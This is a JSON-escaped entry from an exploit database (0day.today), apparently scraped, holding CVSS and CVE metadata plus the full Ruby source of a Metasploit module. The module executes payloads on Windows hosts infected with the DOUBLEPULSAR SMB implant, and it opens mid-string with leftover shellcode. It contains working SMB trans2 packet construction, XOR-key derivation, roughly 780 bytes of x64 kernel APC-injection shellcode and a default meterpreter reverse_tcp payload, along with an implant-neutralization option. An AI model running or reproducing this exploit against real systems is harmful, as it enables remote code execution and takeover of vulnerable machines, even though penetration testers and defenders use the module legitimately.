\"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-20] #"}, "lastseen": "2021-10-20T08:18:11", "differentElements": ["sourceData"], "edition": 50}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "d3fdad89b4c30a44700641362e5d8b99", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-20T22:23:49", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-20T22:23:49", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-20T22:23:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-21] 